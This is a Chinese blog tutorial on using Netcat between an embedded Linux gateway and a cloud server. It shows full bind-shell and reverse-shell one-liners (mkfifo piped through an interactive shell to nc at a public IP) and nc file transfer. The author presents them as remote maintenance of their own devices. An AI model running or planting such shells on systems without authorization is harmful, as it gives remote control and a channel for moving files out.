首页 类库正文

Netcat之正向shell、反向shell、文件传输

小编 2026-06-25 阅读:683 评论:0
使用场景: 客户端:嵌入式Linux网关 服务器:阿里云服务器 1、正向shell 客户端连接服务器,获取服务器的shell 服务器: [root@VM_0_14_centos ~]# mkf...

使用场景:
客户端:嵌入式Linux网关
服务器:阿里云服务器

1、正向shell
客户端连接服务器,获取服务器的shell
服务器:

[root@VM_0_14_centos ~]# mkfifo /tmp/fifo
[root@VM_0_14_centos ~]# cat /tmp/fifo | /bin/bash -i 2>&1 | nc -l 10000 > /tmp/fifo

客户端:

root@Shuncom:/tmp# nc 211.159.189.50 10000
[root@VM_0_14_centos ~]# ls
ls
data
dead.letter
project
raspberry-project
shuncom
SZ-City4-0907
tmp
You have new mail in /var/spool/mail/root
[root@VM_0_14_centos ~]#

2、反向shell
客户端连接服务器,服务器获取客户端的shell
服务器:

[root@VM_0_14_centos ~]# nc -l 10000

客户端:

root@Shuncom:/tmp# mkfifo fifo
root@Shuncom:/tmp# cat /tmp/fifo | /bin/sh -i 2>&1 | nc 211.159.189.50 10000 > /tmp/fifo

此时会在服务器得到客户端的shell

[root@VM_0_14_centos ~]# nc -l 10000


BusyBox v1.23.2 (2018-10-19 13:23:37 CST) built-in shell (ash)

@Shuncom:/tmp# ls
TZ
dhcp.leases
dnsmasq.d
etc
eth0
fifo
gcom.5859.11.1545484121.core
hosts
lib
lock
log
opkg-lists
overlay
reboot_boad
resolv.conf
resolv.conf.auto
run
shm
state
sysinfo
test.sh
time_ok
timeerror.log
tmpnet
usr
@Shuncom:/tmp#

项目中服务器可以通过业务协议向网关发送一条消息,网关去连接指定的服务器IP和Port,就建立了通道,在服务端就可以远程操作网关,查看网关信息。

3、文件传输
服务器:

[root@VM_0_14_centos tmp]# nc -l 9995 > a.sh

客户端

root@Shuncom:/tmp# nc 211.159.189.50 9995 < test.sh

即可在服务器得到文件

[root@VM_0_14_centos tmp]# ls
a.sh

用这种方式传输文件有一个好处就是不用输入密码

版权声明

本文仅代表作者观点,不代表百度立场。
本文系作者授权百度百家发表,未经许可,不得转载。

上一篇:Linux学习笔记(七)——初识bash 下一篇:一个人的命运决定于每天晚上8点到10点之间(转)
相关阅读
热门文章

  • 机房智能化温湿度解决方式之POE供电以太网温湿度传感器

    机房智能化温湿度解决方式之POE供电以太网温湿度传感器
    机房智能化温湿度解决方式之POE供电以太网温湿度传感器 北京盈创力和电子科技有限公司 智能型TCP网口温湿度记录仪 北京IP网络温湿度记录仪厂家,北京盈创力和 北京智能型TCP网口温湿度记录仪IP网络温湿度记录仪是一种新型的基于TCP/IP协议双绞线以太网标准温湿度采集模块,利用它可以实现现场温度值、相对湿度值的采集,同时利用其自身的RJ45通信接口可以方便地和机房监控主机或交换机集线器进行联网。 工作于-40℃~85℃工业级带...

  • Sequential Monte Carlo Methods (SMC) 序列蒙特卡洛/粒子滤波/Bootstrap Filtering

    Sequential Monte Carlo Methods (SMC) 序列蒙特卡洛/粒子滤波/Bootstrap Filtering
    Problem Statement 我们考虑一个具有马尔可夫性质、非线性、非高斯的状态空间模型(State Space Model):对于一个时间序列上的观测结果{yt,t∈N}\\{ y_t , t \\in N \\}{yt​,t∈N},我们认为每个观测结果yty_tyt​的生成依赖于一个无法直接观察的隐变量xt∈{xt,t∈N}x_t \\in \\{x_t , t \\in N \\}xt​∈{xt​,t∈N},即:p(...

  • HTTP状态保持的原理

    HTTP状态保持的原理
    a)在用户登录之后,浏览器返回响应的时候会在响应中添加上cookieb)浏览器接收到cookie之后会自动保存c)当用户再次请求同一服务器中的其他网页的时候,浏览器会自动带上之前保存的cookied)服务接收到请求之后可以请 request 对象中取到cookie 判断当前用户是否登录  Http是无状态的,就是连接时数据互通,关闭后...

  • Hive 系统函数及示例

    Hive 系统函数及示例
    查看所有系统函数 show functions; 函数分类 内置函数【系统函数】 数学函数: floor、round、ceil、cos、log2等 字符串函数: length、reverse、trim、lower、get_json_object、repeat等 收集函数: size 转换函数: cast 日期函数: year、month、datediff、date、date_add等 条件函数: coalesce、case…w...

  • CSRF的原理和防范措施

    CSRF的原理和防范措施
    a)攻击原理:i.用户C访问正常网站A时进行登录,浏览器保存A的cookieii.用户C再访问攻击网站B,网站B上有某个隐藏的链接或者图片标签会自动请求网站A的URL地址,例如表单提交,传指定的参数iii.而攻击网站B在访问网站A的时候,浏览器会自动带上网站A的cookieiv.所以网站A在接收到请求之后可判断当前用户是登录状态,所以...
最近发表
标签列表

Powered By Z-BlogPHP  Theme By 老白编程